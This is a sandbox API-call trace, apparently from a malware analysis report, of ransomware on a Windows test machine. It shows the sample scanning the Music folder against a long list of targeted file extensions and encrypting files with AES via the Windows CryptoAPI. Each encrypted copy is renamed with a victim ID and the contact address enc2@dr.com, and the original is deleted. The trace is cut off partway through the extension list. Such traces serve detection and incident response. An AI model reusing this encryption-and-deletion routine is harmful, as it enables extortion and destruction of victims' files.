	[0190.390] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpString2="3H3UVQNynSqrnC.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\3H3UVQNynSqrnC.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\3H3UVQNynSqrnC.m4a"
	[0190.390] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\3H3UVQNynSqrnC.m4a") returned 46
	[0190.390] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.390] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\3H3UVQNynSqrnC.m4a", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a") returned 0x2e
	[0190.390] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.391] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.391] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a") returned="c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a"
	[0190.391] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a") returned 46
	[0190.391] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.391] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.391] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0190.391] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.392] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0190.392] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.392] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.392] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0190.410] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x592f, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x592f, lpOverlapped=0x0) returned 1
	[0190.412] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.412] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb198) returned 1
	[0190.415] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.415] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0190.415] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.415] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0190.415] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.415] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0190.415] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.416] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x592f, dwBufLen=0x592f | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x5930) returned 1
	[0190.417] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.417] RtlMoveMemory (in: Destination=0xfe2ab8, Source=0xfdd180, Length=0x592f | out: Destination=0xfe2ab8) 
	[0190.417] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.417] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe2ab8*, pdwDataLen=0x18bc0c*=0x592f, dwBufLen=0x5930 | out: pbData=0xfe2ab8*, pdwDataLen=0x18bc0c*=0x5930) returned 1
	[0190.419] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.420] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0190.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.420] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0190.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.420] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0190.420] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.420] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.421] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.421] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0190.422] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0190.422] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0190.423] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe2ab8*, nNumberOfBytesToWrite=0x5930, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe2ab8*, lpNumberOfBytesWritten=0x18c068*=0x5930, lpOverlapped=0x0) returned 1
	[0190.431] CloseHandle (hObject=0x2c0) returned 1
	[0190.431] CloseHandle (hObject=0x384) returned 1
	[0190.432] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a")) returned 1
	[0190.439] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\3h3uvqnynsqrnc.m4a")) returned 0
	[0190.439] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8849dad0, ftCreationTime.dwHighDateTime=0x1d9741f, ftLastAccessTime.dwLowDateTime=0x1afbe8b0, ftLastAccessTime.dwHighDateTime=0x1d97451, ftLastWriteTime.dwLowDateTime=0x1afbe8b0, ftLastWriteTime.dwHighDateTime=0x1d97451, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4 WeFFAYw8qt-MRv", cAlternateFileName="4WEFFA~1")) returned 1
	[0190.439] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43649a85, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43649a85, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0190.439] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0190.439] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0190.439] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
	[0190.439] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini"
	[0190.440] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini") returned 39
	[0190.443] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.444] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini", cchLength=0x27 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\desktop.ini") returned 0x27
	[0190.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.444] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.444] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\music\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\music\\desktop.ini"
	[0190.444] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\desktop.ini") returned 39
	[0190.444] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.445] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.445] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0190.445] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.445] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.